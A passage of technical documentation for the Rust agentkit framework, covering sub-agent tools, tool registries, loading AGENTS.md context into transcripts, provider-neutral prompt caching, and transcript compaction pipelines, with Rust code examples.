  Model: ToolCall(subagent, { task: "Find all uses of unsafe code", tools: ["fs", "shell"] })
         │
         ▼
  Inner agent (researcher):
    Model: ToolCall(fs.read_file, { path: "src/lib.rs" })
    Model: ToolCall(shell.exec, { executable: "grep", argv: ["-r", "unsafe", "src/"] })
    Model: "Found 3 uses of unsafe in parser.rs, codec.rs, and ffi.rs..."
         │
         ▼
  Outer agent receives: "Found 3 uses of unsafe..."
  Model: "Based on my research, here's the report..."

The inner agent has its own transcript, tools, and session. It doesn’t share state with the outer agent — this isolation prevents context pollution and makes the sub-agent’s scope explicit.

The openrouter-subagent-tool example shows a complete implementation of this pattern.

Tool registries from crates

Organize related tools into crate-level registry() functions:

#![allow(unused)]
fn main() {
pub fn registry() -> ToolRegistry {
    ToolRegistry::new()
        .with(ToolA::default())
        .with(ToolB::default())
}
}

Host applications merge registries from multiple crates:

#![allow(unused)]
fn main() {
let registry = my_tools::registry()
    .merge(agentkit_tool_fs::registry())
    .merge(agentkit_tool_shell::registry());
}

Stateful tools

Tools that need to maintain state across invocations (counters, caches, connection pools) should use ToolResources:

#![allow(unused)]
fn main() {
struct MyToolResources {
    cache: Mutex<HashMap<String, String>>,
    http_client: reqwest::Client,
}

impl ToolResources for MyToolResources {
    fn as_any(&self) -> &dyn Any { self }
}

// In your tool's invoke():
let resources = ctx.resources
    .as_any()
    .downcast_ref::<MyToolResources>()
    .expect("MyToolResources not registered");

let mut cache = resources.cache.lock().unwrap();
}

Register resources when building the agent:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .resources(MyToolResources::new())
    .build()?;
}

All tools in the session share the same ToolResources instance. This is how the filesystem tools share their read-before-write tracker — FileSystemToolResources implements ToolResources and is downcast in each tool’s invoke().

Example: openrouter-subagent-tool implements a custom tool that runs a nested agent as a tool call.

Crate: agentkit-tools-core — Tool, ToolRegistry, ToolResources, ToolContext.

Context loading

A coding agent needs to understand the project it’s working in. This chapter covers agentkit-context: how agents load project instructions, conventions, and ambient context into the transcript.

The problem

Without context, a coding agent is generic. It doesn’t know your project’s conventions, tech stack, or constraints. It will write Python-style Rust, ignore your linting rules, and miss architectural patterns that are obvious to anyone who has read the README.

Context loading bridges this gap by injecting project-specific information into the transcript before the model sees it:

Without context:

  Transcript: [System("You are a coding assistant"), User("Fix the parser")]
  Model: writes code that doesn't match project conventions


With context:

  Transcript: [
      System("You are a coding assistant"),
      Context("This project uses Rust 2024 edition. Error handling uses thiserror..."),
      Context("All public types must have doc comments. Use `cargo clippy` before committing."),
      User("Fix the parser"),
  ]
  Model: writes idiomatic code that follows project conventions

Once system prompts and context items are stable, they form a reusable prefix for every turn. The next chapter covers prompt caching — the transport optimization that exploits this stability.

ContextLoader

The loader combines multiple context sources and produces Vec<Item> with ItemKind::Context:

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(my_custom_source)
    .load()
    .await?;
}

Sources are loaded in registration order and their results are concatenated. The resulting items are ordinary transcript entries — the loop and providers don’t need a separate context path. They’re submitted to the driver alongside system items at session start:

#![allow(unused)]
fn main() {
driver.submit_input(system_items)?;
driver.submit_input(context_items)?; // ← loaded by ContextLoader
driver.submit_input(user_items)?;
}

AgentsMd

The primary built-in source loads AGENTS.md files (similar to how Claude Code uses CLAUDE.md or Cursor uses .cursorrules):

#![allow(unused)]
fn main() {
// Find the nearest AGENTS.md by walking up from the workspace
let source = AgentsMd::discover(workspace_root);

// Find all AGENTS.md files from root to workspace (stacked)
let source = AgentsMd::discover_all(workspace_root);
}

Discovery modes

AgentsMdMode::Nearest — stop at the first match:

  /home/user/projects/myapp/AGENTS.md     ← found, stop
  /home/user/projects/AGENTS.md           (not checked)
  /home/user/AGENTS.md                    (not checked)


AgentsMdMode::All — collect everything, outermost first:

  /home/user/AGENTS.md                    ← loaded first (general)
  /home/user/projects/AGENTS.md           ← loaded second (more specific)
  /home/user/projects/myapp/AGENTS.md     ← loaded last (most specific)

The All mode is useful for organizations that layer context: a company-wide AGENTS.md at a parent directory, project-level instructions at the repo root, and module-specific instructions in subdirectories. More specific instructions appear later in the transcript and take precedence in the model’s attention.
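The All-mode walk can be sketched with std alone: collect hits from the workspace upward through its ancestors, then reverse so the outermost file comes first. (discover_all here is an illustrative stand-in, not the crate’s actual signature.)

```rust
use std::path::{Path, PathBuf};

fn discover_all(workspace: &Path, file_name: &str) -> Vec<PathBuf> {
    // ancestors() yields the workspace first, then each parent directory.
    let mut found: Vec<PathBuf> = workspace
        .ancestors()
        .map(|dir| dir.join(file_name))
        .filter(|candidate| candidate.is_file())
        .collect();
    found.reverse(); // outermost (most general) first, workspace-level last
    found
}
```

Reversing is what puts general instructions before specific ones in the transcript, so later, more specific items override them in the model’s attention.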

Configuration

#![allow(unused)]
fn main() {
let source = AgentsMd::discover_all(workspace_root)
    .with_file_name("CLAUDE.md")            // Custom file name
    .with_search_dir(".agent/")             // Check sidecar directories
    .with_path("/team/shared/AGENTS.md");   // Explicit file path
}

  Method            What it does
  with_file_name    Change from AGENTS.md to a different name
  with_search_dir   Check a specific directory (no ancestor walk)
  with_path         Include an explicit file path (skipped if missing)

Explicit paths and search dirs are checked before ancestor discovery. All results are deduplicated by path.
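
The merge-and-dedup step can be sketched as a small helper (hypothetical, not the crate's code): candidates arrive in priority order, and only the first occurrence of each path survives.

```rust
#![allow(unused)]
use std::collections::HashSet;
use std::path::PathBuf;

/// Keep the first occurrence of each path, preserving order.
/// Explicit paths and search-dir hits come before ancestor discovery,
/// so they win when the same file appears twice.
fn dedup_by_path(candidates: Vec<PathBuf>) -> Vec<PathBuf> {
    let mut seen = HashSet::new();
    candidates
        .into_iter()
        .filter(|p| seen.insert(p.clone())) // insert returns false on repeats
        .collect()
}

fn main() {
    let merged = dedup_by_path(vec![
        PathBuf::from("/team/shared/AGENTS.md"), // explicit path: checked first
        PathBuf::from("/repo/AGENTS.md"),        // ancestor discovery
        PathBuf::from("/team/shared/AGENTS.md"), // duplicate: dropped
    ]);
    assert_eq!(merged.len(), 2);
    assert_eq!(merged[0], PathBuf::from("/team/shared/AGENTS.md"));
}
```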

Loaded item structure

Each loaded file becomes an Item with metadata:

#![allow(unused)]
fn main() {
Item {
    kind: ItemKind::Context,
    parts: [Part::Text(TextPart {
        text: "[Loaded AGENTS]\nPath: /workspace/AGENTS.md\n\n<file contents>",
        ...
    })],
    metadata: {
        "agentkit.context.source": "agents_md",
        "agentkit.context.path": "/workspace/AGENTS.md",
    },
}
}

The metadata lets compaction strategies and reporters identify where context came from. The source key distinguishes AgentsMd items from other context sources.

The ContextSource trait

All context loading goes through a simple trait:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ContextSource: Send + Sync {
    async fn load(&self) -> Result<Vec<Item>, ContextError>;
}
}

AgentsMd implements this trait. Your own types implement it to pull context from anywhere else — a database, an HTTP endpoint, or the output of a command.

Context vs System items

ItemKind::Context is distinct from ItemKind::System because they serve different purposes:

              ItemKind::System                 ItemKind::Context
  Example     “You are a coding assistant”     “This project uses Rust 2024 edition”
  Origin      Hardcoded by the application     Loaded from project files
  Scope       Same across all projects         Different per project
  Mutability  Never changes during a session   May be refreshed on context reload
  Compaction  Preserved during compaction      May be summarized or refreshed

This distinction matters for compaction:

  • System items are always preserved — they define the agent’s identity
  • Context items might be refreshed (reload from disk) or summarized during compaction

Writing custom context sources

The ContextSource trait is simple enough that custom sources are straightforward:

#![allow(unused)]
fn main() {
struct GitBranchContext;

#[async_trait]
impl ContextSource for GitBranchContext {
    async fn load(&self) -> Result<Vec<Item>, ContextError> {
        let output = tokio::process::Command::new("git")
            .args(["branch", "--show-current"])
            .output()
            .await
            .map_err(|e| ContextError::ReadFailed {
                path: PathBuf::from(".git"),
                error: e,
            })?;

        let branch = String::from_utf8_lossy(&output.stdout).trim().to_string();
        Ok(vec![Item {
            id: None,
            kind: ItemKind::Context,
            parts: vec![Part::Text(TextPart {
                text: format!("Current git branch: {branch}"),
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        }])
    }
}
}

Register it alongside other sources:

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(GitBranchContext)
    .load()
    .await?;
}

Other useful custom sources:

  • Load dependency versions from Cargo.toml or package.json
  • Load CI configuration summaries
  • Load recent git log entries
  • Load MCP resources (via ResourceProvider)
  • Load team-specific conventions from a shared server

Example: openrouter-context-agent demonstrates context loading from AGENTS.md and skills directories.

Crate: agentkit-context — depends on agentkit-core and async-fs for filesystem operations.

Prompt caching

Prompt caching reduces cost and latency by reusing stable prefixes of a turn request. This chapter covers the cache model in agentkit-loop: what the host configures, what the loop passes to providers, and how adapters translate that into provider-specific behavior.

Why caching lives at the request level

Caching is a transport optimization, not transcript semantics. The transcript is the conversation itself: system prompts, user messages, tool calls, tool results, and context items. Caching is applied when a turn is sent to a provider.

That distinction is why agentkit models caching on SessionConfig and TurnRequest, not on Item or Part.

#![allow(unused)]
fn main() {
pub struct SessionConfig {
    pub session_id: SessionId,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}

pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The host sets a session-level default. The loop copies that into each TurnRequest unless the host overrides the next turn explicitly.

The cache request shape

The request is provider-neutral:

#![allow(unused)]
fn main() {
pub enum PromptCacheMode {
    Disabled,
    BestEffort,
    Required,
}

pub enum PromptCacheRetention {
    Default,
    Short,
    Extended,
}

pub enum PromptCacheStrategy {
    Automatic,
    Explicit {
        breakpoints: Vec<PromptCacheBreakpoint>,
    },
}

pub enum PromptCacheBreakpoint {
    ToolsEnd,
    TranscriptItemEnd { index: usize },
    TranscriptPartEnd { item_index: usize, part_index: usize },
}

pub struct PromptCacheRequest {
    pub mode: PromptCacheMode,
    pub strategy: PromptCacheStrategy,
    pub retention: Option<PromptCacheRetention>,
    pub key: Option<String>,
}
}

Field semantics

  Field      Variant     Meaning
  mode       Disabled    Do not send cache hints for this turn
             BestEffort  Use caching if the provider supports it; degrade silently otherwise
             Required    Fail the turn if the cache request cannot be honored
  strategy   Automatic   Let the adapter use native provider behavior, or emulate it internally
             Explicit    The host specifies concrete cache boundaries
  retention  —           Provider-neutral hint for short-lived vs extended retention
  key        —           Optional stable cache key for providers that support one

Session defaults

The simplest place to configure caching is the session:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("coding-agent"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;
}

This says:

  • try to use prompt caching
  • let the provider or adapter choose the prefix automatically
  • prefer short-lived retention
  • do not require a user-supplied cache key

None vs Disabled

These have different semantics:

  Value                                     Meaning
  cache: None                               No cache preference — adapters don’t add cache fields; provider-native automatic caching may still happen
  cache: Some(... { mode: Disabled, .. })   Explicitly disable cache controls from agentkit for this session or turn
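
A minimal sketch of how an adapter might branch on this distinction, using stand-in types (the return strings are illustrative labels, not real agentkit behavior):

```rust
#![allow(unused)]
#[derive(Clone, Copy, PartialEq, Debug)]
enum PromptCacheMode { Disabled, BestEffort, Required }

struct PromptCacheRequest { mode: PromptCacheMode }

/// None: add no cache fields at all, so provider defaults apply.
/// Some(Disabled): actively suppress caching for this request.
/// Some(anything else): translate the request into provider fields.
fn cache_action(cache: &Option<PromptCacheRequest>) -> &'static str {
    match cache {
        None => "no cache fields; provider-native behavior may still apply",
        Some(r) if r.mode == PromptCacheMode::Disabled => "explicitly disable caching",
        Some(_) => "translate request into provider cache fields",
    }
}

fn main() {
    assert_eq!(
        cache_action(&None),
        "no cache fields; provider-native behavior may still apply"
    );
    let disabled = Some(PromptCacheRequest { mode: PromptCacheMode::Disabled });
    assert_eq!(cache_action(&disabled), "explicitly disable caching");
    let best = Some(PromptCacheRequest { mode: PromptCacheMode::BestEffort });
    assert_eq!(cache_action(&best), "translate request into provider cache fields");
}
```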

Automatic strategy

PromptCacheStrategy::Automatic is the recommended default for most applications:

#![allow(unused)]
fn main() {
PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Automatic,
    retention: Some(PromptCacheRetention::Short),
    key: None,
}
}

Why this is the default shape:

  • it keeps the host provider-agnostic
  • OpenAI-style providers can use native automatic caching
  • Anthropic-style providers can be supported by adapters that synthesize explicit cache headers internally
  • unsupported providers degrade cleanly in BestEffort mode

In other words: the host chooses the policy, not the provider-specific mechanism.

Explicit strategy

When the host knows the desired boundaries, it can specify them directly:

#![allow(unused)]
fn main() {
let cache = PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Explicit {
        breakpoints: vec![
            PromptCacheBreakpoint::ToolsEnd,
            PromptCacheBreakpoint::TranscriptItemEnd { index: 3 },
        ],
    },
    retention: Some(PromptCacheRetention::Short),
    key: Some("workspace:agentkit".into()),
};
}

Breakpoints are expressed in request order:

  1. tools
  2. transcript items
  3. transcript parts within an item

This matters for providers that expose explicit cache boundaries on tools or message blocks.
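
One way to see the ordering rule is as a sort key over breakpoints. This is a sketch under the assumption that an item's end sorts after all of its parts; the `order_key` helper is illustrative, not part of the crate:

```rust
#![allow(unused)]
#[derive(Debug, PartialEq)]
enum PromptCacheBreakpoint {
    ToolsEnd,
    TranscriptItemEnd { index: usize },
    TranscriptPartEnd { item_index: usize, part_index: usize },
}

/// Request-order key: tools first, then transcript positions.
/// An item's end sorts after every part within that item.
fn order_key(bp: &PromptCacheBreakpoint) -> (usize, usize, usize) {
    match bp {
        PromptCacheBreakpoint::ToolsEnd => (0, 0, 0),
        PromptCacheBreakpoint::TranscriptPartEnd { item_index, part_index } => {
            (1, *item_index, *part_index)
        }
        PromptCacheBreakpoint::TranscriptItemEnd { index } => (1, *index, usize::MAX),
    }
}

fn main() {
    let mut bps = vec![
        PromptCacheBreakpoint::TranscriptItemEnd { index: 3 },
        PromptCacheBreakpoint::ToolsEnd,
        PromptCacheBreakpoint::TranscriptPartEnd { item_index: 3, part_index: 1 },
    ];
    bps.sort_by_key(order_key);
    assert_eq!(bps[0], PromptCacheBreakpoint::ToolsEnd);
    assert_eq!(bps[1], PromptCacheBreakpoint::TranscriptPartEnd { item_index: 3, part_index: 1 });
}
```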

Per-turn overrides

Session defaults are often enough, but the loop also supports per-turn overrides:

#![allow(unused)]
fn main() {
driver.set_next_turn_cache(PromptCacheRequest {
    mode: PromptCacheMode::Required,
    strategy: PromptCacheStrategy::Explicit {
        breakpoints: vec![PromptCacheBreakpoint::ToolsEnd],
    },
    retention: Some(PromptCacheRetention::Extended),
    key: Some("release-planning".into()),
})?;

driver.submit_input(vec![user_item])?;
}

Or in one call:

#![allow(unused)]
fn main() {
driver.submit_input_with_cache(
    vec![user_item],
    PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        strategy: PromptCacheStrategy::Automatic,
        retention: Some(PromptCacheRetention::Short),
        key: None,
    },
)?;
}

The override applies to the next model turn only. Later turns fall back to the session default.
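
The apply-once semantics can be captured with `Option::take`. A sketch with stand-in types (the `CachePolicy` struct is hypothetical, not loop internals):

```rust
#![allow(unused)]
#[derive(Clone, Debug, PartialEq)]
struct PromptCacheRequest { key: Option<String> }

/// The override is consumed by the next turn; later turns fall back
/// to the session default.
struct CachePolicy {
    session_default: Option<PromptCacheRequest>,
    next_turn_override: Option<PromptCacheRequest>,
}

impl CachePolicy {
    fn cache_for_next_turn(&mut self) -> Option<PromptCacheRequest> {
        // Option::take clears the override so it applies exactly once.
        self.next_turn_override
            .take()
            .or_else(|| self.session_default.clone())
    }
}

fn main() {
    let mut policy = CachePolicy {
        session_default: Some(PromptCacheRequest { key: None }),
        next_turn_override: Some(PromptCacheRequest { key: Some("release-planning".into()) }),
    };
    let first = policy.cache_for_next_turn().unwrap();
    assert_eq!(first.key.as_deref(), Some("release-planning")); // override used
    let second = policy.cache_for_next_turn().unwrap();
    assert_eq!(second.key, None); // back to the session default
}
```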

How adapters use it

The loop does not interpret cache semantics itself. It passes the normalized request through to the adapter.

For completions-style providers, the mapping hook is:

#![allow(unused)]
fn main() {
fn apply_prompt_cache(
    &self,
    body: &mut serde_json::Map<String, Value>,
    request: &TurnRequest,
) -> Result<(), LoopError>;
}

That gives adapters three implementation choices:

  1. use native automatic caching controls
  2. synthesize explicit cache headers or request fields from the normalized request
  3. ignore unsupported cache requests in BestEffort mode, or error in Required mode
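
A sketch of those three choices for an imaginary provider whose only cache control is a key field. Everything here is a stand-in: the `"prompt_cache_key"` field name is hypothetical, and a `HashMap` plays the role of the JSON request body:

```rust
#![allow(unused)]
use std::collections::HashMap;

#[derive(PartialEq)]
enum PromptCacheMode { Disabled, BestEffort, Required }

struct PromptCacheRequest { mode: PromptCacheMode, key: Option<String> }

/// Map the normalized cache request onto a provider body that only
/// supports a cache key. BestEffort degrades silently; Required errors
/// when the request cannot be honored.
fn apply_prompt_cache(
    body: &mut HashMap<String, String>,
    cache: &PromptCacheRequest,
) -> Result<(), String> {
    match (&cache.mode, &cache.key) {
        (PromptCacheMode::Disabled, _) => Ok(()), // send no cache fields
        (_, Some(key)) => {
            body.insert("prompt_cache_key".into(), key.clone());
            Ok(())
        }
        (PromptCacheMode::Required, None) => {
            Err("cache required, but this provider needs an explicit key".into())
        }
        (PromptCacheMode::BestEffort, None) => Ok(()), // degrade silently
    }
}

fn main() {
    let mut body = HashMap::new();
    let req = PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        key: Some("workspace:agentkit".into()),
    };
    apply_prompt_cache(&mut body, &req).unwrap();
    assert_eq!(body.get("prompt_cache_key").map(String::as_str), Some("workspace:agentkit"));

    let strict = PromptCacheRequest { mode: PromptCacheMode::Required, key: None };
    assert!(apply_prompt_cache(&mut body, &strict).is_err());
}
```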

This is the architectural boundary: agentkit keeps the host-facing API stable while each provider adapter chooses the correct wire format.

Reporting cache usage

Providers can report cache reads and writes through normalized usage fields:

#![allow(unused)]
fn main() {
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}
}

  • cached_input_tokens — input tokens served from cache
  • cache_write_input_tokens — input tokens written into cache on this request

This makes caching visible to reporters and host-side cost accounting without exposing provider-specific response formats.
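
A sketch of the kind of host-side accounting this enables. The 10% rate for cached input is a made-up illustration, not any provider's real pricing:

```rust
#![allow(unused)]
struct TokenUsage {
    input_tokens: u64,
    output_tokens: u64,
    reasoning_tokens: Option<u64>,
    cached_input_tokens: Option<u64>,
    cache_write_input_tokens: Option<u64>,
}

/// Bill uncached input at full price and cached input at a 10% rate
/// (illustrative discount). Prices are in micro-units per token.
fn input_cost_micros(u: &TokenUsage, price_per_tok_micros: u64) -> u64 {
    let cached = u.cached_input_tokens.unwrap_or(0);
    let uncached = u.input_tokens.saturating_sub(cached);
    uncached * price_per_tok_micros + cached * price_per_tok_micros / 10
}

fn main() {
    let usage = TokenUsage {
        input_tokens: 1000,
        output_tokens: 200,
        reasoning_tokens: None,
        cached_input_tokens: Some(800),
        cache_write_input_tokens: None,
    };
    // 200 uncached * 10 + 800 cached * 1 = 2800
    assert_eq!(input_cost_micros(&usage, 10), 2800);
}
```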

Practical recommendation

For most hosts, start here:

#![allow(unused)]
fn main() {
SessionConfig {
    session_id: SessionId::new("demo"),
    metadata: MetadataMap::new(),
    cache: Some(PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        strategy: PromptCacheStrategy::Automatic,
        retention: Some(PromptCacheRetention::Short),
        key: None,
    }),
}
}

Then reach for explicit breakpoints only when you need to control exact cache boundaries.

Crate: Prompt caching types live in agentkit-core. Session and turn-level cache handling is in agentkit-loop. Provider-specific cache mapping is in each agentkit-provider-* crate.

Transcript compaction

Long conversations exceed context windows. Compaction is how you keep an agent session viable without losing important context. This chapter covers agentkit-compaction: the trigger, strategy, and pipeline system.

The design

Compaction is optional and host-configured. It has three concerns:

  1. When to compact — the trigger
  2. How to compact — the strategy (or pipeline of strategies)
  3. What to use for semantic summarization — the optional backend

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .compaction(CompactionConfig::new(trigger, strategy))
    .build()?;
}

Triggers

A CompactionTrigger decides whether compaction should run before a turn:

#![allow(unused)]
fn main() {
pub trait CompactionTrigger {
    fn should_compact(&self, transcript: &[Item], reason: &CompactionReason) -> bool;
}
}

Built-in: ItemCountTrigger::new(12) fires when the transcript exceeds 12 items.
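
The trigger logic is a threshold check. A simplified sketch (the real trait also receives the transcript items and a CompactionReason, elided here):

```rust
#![allow(unused)]
/// Along the lines of ItemCountTrigger::new(12): fires once the
/// transcript grows past the threshold, not at it.
struct ItemCountTrigger { max_items: usize }

impl ItemCountTrigger {
    fn new(max_items: usize) -> Self {
        Self { max_items }
    }

    fn should_compact(&self, transcript_len: usize) -> bool {
        transcript_len > self.max_items
    }
}

fn main() {
    let trigger = ItemCountTrigger::new(12);
    assert!(!trigger.should_compact(12)); // at the threshold: no
    assert!(trigger.should_compact(13));  // past it: compact
}
```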

Strategies

A CompactionStrategy transforms the transcript:

#![allow(unused)]
fn main() {
pub trait CompactionStrategy {
    async fn compact(
        &self,
        request: CompactionRequest,
        ctx: &mut CompactionContext,
    ) -> Result<CompactionResult, CompactionError>;
}
}

Built-in strategies:

  Strategy                        Description
  DropReasoningStrategy           Removes reasoning parts from assistant items
  DropFailedToolResultsStrategy   Removes tool results where is_error: true
  KeepRecentStrategy              Keeps the last N non-preserved items
  SummarizeOlderStrategy          Summarizes older items through the backend

Preservation

KeepRecentStrategy supports preservation rules:

#![allow(unused)]
fn main() {
KeepRecentStrategy::new(8)
    .preserve_kind(ItemKind::System)
    .preserve_kind(ItemKind::Context)
}

System and context items are kept regardless of age. Only user/assistant/tool items are subject to trimming.
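
The trimming rule can be expressed as a pure function over item kinds. A sketch of the shape of KeepRecentStrategy (operating on bare `ItemKind`s rather than full items):

```rust
#![allow(unused)]
use std::collections::HashSet;

#[derive(Clone, Copy, PartialEq, Debug)]
enum ItemKind { System, Context, User, Assistant, Tool }

/// Keep every preserved-kind item plus the last `n` non-preserved
/// items, all in original order.
fn keep_recent(items: &[ItemKind], n: usize, preserved: &[ItemKind]) -> Vec<ItemKind> {
    // Indices of items subject to trimming.
    let non_preserved: Vec<usize> = items
        .iter()
        .enumerate()
        .filter(|(_, k)| !preserved.contains(k))
        .map(|(i, _)| i)
        .collect();
    // Everything before the last `n` of those gets dropped.
    let cutoff = non_preserved.len().saturating_sub(n);
    let dropped: HashSet<usize> = non_preserved[..cutoff].iter().copied().collect();
    items
        .iter()
        .enumerate()
        .filter(|(i, _)| !dropped.contains(i))
        .map(|(_, k)| *k)
        .collect()
}

fn main() {
    let transcript = [
        ItemKind::System, ItemKind::Context,
        ItemKind::User, ItemKind::Assistant, ItemKind::User, ItemKind::Assistant,
    ];
    let kept = keep_recent(&transcript, 2, &[ItemKind::System, ItemKind::Context]);
    // System and Context survive regardless of age; only the last two
    // conversational items remain.
    assert_eq!(kept, vec![ItemKind::System, ItemKind::Context, ItemKind::User, ItemKind::Assistant]);
}
```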

Pipelines

Multiple strategies compose into a pipeline:

#![allow(unused)]
fn main() {
CompactionPipeline::new()
    .with_strategy(DropReasoningStrategy::new())
    .with_strategy(DropFailedToolResultsStrategy::new())
    .with_strategy(KeepRecentStrategy::new(8)
        .preserve_kind(ItemKind::System)
        .preserve_kind(ItemKind::Context))
}

Strategies execute in order. Each one receives the output of the previous.

Semantic compaction

For summarization, the host injects a CompactionBackend:

#![allow(unused)]
fn main() {
let config = CompactionConfig::new(trigger, strategy).with_backend(my_backend);
}

The backend receives a SummaryRequest and returns a SummaryResult. agentkit does not include a built-in LLM client — the backend is host-provided. The openrouter-compaction-agent example uses a nested agent loop as the summarization backend.

A compaction example

Before and after a compaction pipeline run:

Before (20 items, trigger threshold: 12):

  [0]  System: "You are a coding assistant"           ← preserved
  [1]  Context: "Project uses Rust 2024..."            ← preserved
  [2]  User: "What files are in src/?"
  [3]  Asst: (reasoning) "Let me list the directory"
             (text) "I'll check..."
             (tool_call) fs.list_directory
  [4]  Tool: ["main.rs", "lib.rs", "parser.rs"]
  [5]  Asst: "There are three files..."
  [6]  User: "Read parser.rs"
  [7]  Asst: (tool_call) fs.read_file
  [8]  Tool: "fn parse() { ... }"
  [9]  Asst: "The parser contains..."
  [10] User: "Add error handling"
  [11] Asst: (tool_call) fs.replace_in_file
  [12] Tool: { is_error: true, "search text not found" }  ← failed
  [13] Asst: "Let me try again..."
             (tool_call) fs.replace_in_file
  [14] Tool: "Replacement successful"
  [15] Asst: (tool_call) shell.exec("cargo check")
  [16] Tool: "Compiling... 0 errors"
  [17] Asst: "Done! I added error handling..."
  [18] User: "Now add tests"
  [19] Asst: (thinking about tests...)


Pipeline:
  1. DropReasoningStrategy     → removes reasoning parts from [3], [19]
  2. DropFailedToolResultsStrategy → removes failed result [12]
  3. KeepRecentStrategy(8, preserve System+Context)

After (10 items):

  [0]  System: "You are a coding assistant"            ← preserved
  [1]  Context: "Project uses Rust 2024..."             ← preserved
  [2]  Asst: "Let me try again..."                      ← recent 8 start here
             (tool_call) fs.replace_in_file
  [3]  Tool: "Replacement successful"
  [4]  Asst: (tool_call) shell.exec("cargo check")
  [5]  Tool: "Compiling... 0 errors"
  [6]  Asst: "Done! I added error handling..."
  [7]  User: "Now add tests"
  [8]  Asst: (now without reasoning part)

The model lost the early conversation but retains the system prompt, project context, and the most recent work. This is usually a good trade-off — the model’s attention is strongest on recent items anyway.

Compaction vs prompt caching

Compaction and prompt caching both operate on the turn request, but they optimize for different things:

  • Prompt caching tries to reuse an unchanged serialized prefix from earlier turns
  • Compaction deliberately changes the serialized transcript to make it shorter

That means compaction often invalidates the cache prefix even when the conversation is still logically continuous.

Consider the actual prompt prefix sent to the provider:

Before compaction:

  [system]
  [context]
  [user 1]
  [assistant 1]
  [tool result 1]
  [user 2]
  [assistant 2]
  [user 3]

  cacheable prefix for turn N:
  └───────────────────────────────────────────────┘


After compaction:

  [system]                       ← still present
  [context]                      ← still present
  [compaction summary]           ← new item, replaces older history
  [assistant 2]
  [user 3]

  new cacheable prefix for turn N+1:
  └─────────────────────────────┘

Provider-side caches are keyed on the exact prompt prefix, not the semantic meaning of the conversation. These changes all tend to invalidate an existing cache entry:

  • dropping reasoning parts
  • removing failed tool results
  • trimming old user/assistant/tool items
  • replacing many old items with a single summary item
  • reordering or refreshing context items

What survives compaction

After compaction, only the compacted transcript is part of future conversation history from the model’s perspective.

  Retained                                         Dropped
  Preserved System items                           Reasoning blocks
  Preserved Context items                          Failed tool results
  Recent user/assistant/tool items that survived   Older conversation items past the keep window
  Summary items from semantic compaction           Raw items replaced by a summary

The provider-side cache itself is not conversation history — it is transport state owned by the provider. It can accelerate reuse of a prompt prefix, but it does not extend the model’s memory. If compaction removes or rewrites earlier items, those items are gone from the request even if an older provider cache entry still exists.

The trade-off

Compaction can reduce cache hit rates in exchange for keeping the session under the context window.

That trade-off is often still correct:

  • without compaction, the session may stop fitting at all
  • with compaction, the transcript becomes shorter and cheaper even if an old cache prefix is no longer reusable
  • preserved system/context prefixes still give the cache some stable surface area

In practice:

  • structural compaction usually causes smaller cache disruptions
  • semantic compaction causes larger cache disruptions because it replaces many items with a new summary
  • long-lived context items and stable tool schemas are still good cache anchors

This does not mean all caching efficiency is lost after compaction. The typical sequence:

  1. the old cacheable prefix becomes invalid because the transcript changed
  2. the compacted transcript is sent on the next turn
  3. that new, shorter transcript becomes the new cacheable prefix
  4. subsequent turns reuse the compacted prefix until the next compaction cycle

Compaction behaves like a cache reset followed by a new stable baseline.

turn N-1:
  long history prefix                          ← cached

turn N:
  compaction runs
  compacted transcript sent                    ← old cache no longer matches

turn N+1, N+2, N+3:
  same compacted transcript prefix reused      ← new cache hits accumulate

This is one reason semantic compaction can still be efficient overall. The summary item may replace a large unstable history with a much smaller durable prefix that is cheap to resend and easy to cache for the next several turns.

This is why caching is configured separately from compaction in agentkit. Compaction decides what the transcript should be. Caching then operates on whatever transcript remains. For the cache model itself, see Chapter 15.

Loop integration

When compaction fires:

  1. AgentEvent::CompactionStarted is emitted (with the trigger reason)
  2. The strategy pipeline transforms the transcript
  3. The loop replaces its working transcript with the compacted result
  4. AgentEvent::CompactionFinished is emitted (with before/after item counts)

Turn lifecycle with compaction:

  submit_input()
       │
       ▼
  ┌── compaction check ──┐
  │                      │
  │  trigger fires?      │
  │  yes → run pipeline  │
  │  no  → skip          │
  └──────────┬───────────┘
             │
             ▼
  begin model turn (with post-compaction transcript)

This happens before the model sees the transcript for the next turn. The model never observes raw compaction artifacts — it just sees a shorter transcript.

Compaction is not summarization

Most compaction strategies are structural — they drop parts or trim items without understanding semantics. DropReasoningStrategy removes reasoning blocks because they’re verbose and not needed for future turns. KeepRecentStrategy drops old items because the model’s attention is weakest on them.

Only SummarizeOlderStrategy (with a CompactionBackend) does semantic work — it summarizes old items into a shorter form. This requires an LLM call, which adds latency and cost. The openrouter-compaction-agent example uses a nested agent loop as the summarization backend.

Example: openrouter-compaction-agent demonstrates all three types: structural (drop reasoning), hybrid (keep recent + summarize older), and semantic (nested-agent summarization backend).

Crate: agentkit-compaction — depends on agentkit-core. The loop integration is in agentkit-loop.

MCP integration

